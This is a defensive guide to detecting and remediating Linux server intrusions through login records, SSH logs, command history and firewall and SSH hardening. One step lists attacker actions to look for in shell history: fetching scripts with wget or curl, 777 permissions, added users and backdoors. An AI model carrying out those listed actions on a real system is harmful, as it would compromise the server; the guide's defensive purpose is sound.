Detect and Respond to Linux Server Intrusions with Log Analysis

1. View recent login records (last command)

Use the last command to list recent successful logins, showing user, time, source IP and login method.

last -n 20  # show the latest 20 entries

last -f /var/log/wtmp  # specify the wtmp log file

Check usernames (e.g., root, admin, unknown accounts)

Check login times (odd hours, non‑working periods)

Check source IP addresses

Check login methods (SSH pts/X)

Example output:

root pts/0 192.168.1.100 Thu Apr 11 10:15 still logged in

hacker pts/1 45.76.123.89 Thu Apr 11 09:55 - 10:05 (00:10)

2. View failed login attempts (lastb)

The lastb command shows all failed login attempts, useful for spotting brute‑force attacks.

lastb | head -n 20  # show the most recent 20 failures

Repeated failures from the same IP often indicate a brute‑force attempt:

banned ssh:notty 103.20.45.89 Thu Apr 11 09:50-09:51 (00:01)

3. Inspect SSH logs (/var/log/secure or /var/log/auth.log)

3.1 Find successful logins

grep "Accepted" /var/log/secure   # CentOS/RHEL

grep "Accepted" /var/log/auth.log # Ubuntu/Debian

Sample output:

Apr 11 10:15:00 server sshd[1234]: Accepted password for root from 45.76.123.89 port 45678 ssh2

3.2 Find failed logins

grep "Failed password" /var/log/secure

grep "Failed password" /var/log/auth.log

3.3 Find remote root sessions

grep "session opened" /var/log/secure | grep "root"

4. List currently logged‑in users (who / w)

who

w

Unexpected usernames such as hacker or test123 suggest the system may be compromised.

5. Verify SSH configuration integrity

Check whether the SSH daemon configuration has been altered to loosen security. cat /etc/ssh/sshd_config | grep PermitRootLogin Recommended setting:

PermitRootLogin no

6. Review command history (.bash_history)

cat ~/.bash_history | tail -n 50

Look for suspicious actions such as downloading scripts with wget or curl, changing permissions to 777, adding users, or planting backdoors.

7. Trace suspicious IPs (whois / ping)

whois 45.76.123.89

ping -c 4 45.76.123.89

Optionally query AbuseIPDB for reputation:

curl -s https://api.abuseipdb.com/api/v2/check?ipAddress=45.76.123.89

8. Immediate remediation steps

8.1 Block the malicious IP

iptables -A INPUT -s 45.76.123.89 -j DROP

firewall-cmd --add-rich-rule='rule family="ipv4" source address="45.76.123.89" reject' --permanent

fail2ban-client set sshd banip 45.76.123.89

8.2 Harden SSH configuration

vim /etc/ssh/sshd_config

Recommended settings:

Port 2222
PermitRootLogin no
systemctl restart sshd

8.3 Forcefully disconnect suspicious users

pkill -u hacker

8.4 Lock high‑risk accounts

usermod -L hacker

8.5 Reset all passwords

passwd root

8.6 Apply system and security updates

yum update -y   # CentOS
apt update && apt upgrade -y   # Ubuntu/Debian

9. Summary and recommendations

When a server is compromised, the first step is not to reinstall but to investigate the intrusion path and eliminate the foothold. Using built‑in commands such as last, lastb, grep, who, and reviewing .bash_history enables rapid identification of malicious logins and actions.

If the system is fully controlled, back up critical data, reinstall the OS on a trusted platform, and enforce hardened security measures:

Disable root remote login

Use a non‑default SSH port

Enable fail2ban and firewall policies

Prefer key‑based authentication over passwords

Regularly audit login logs and account activity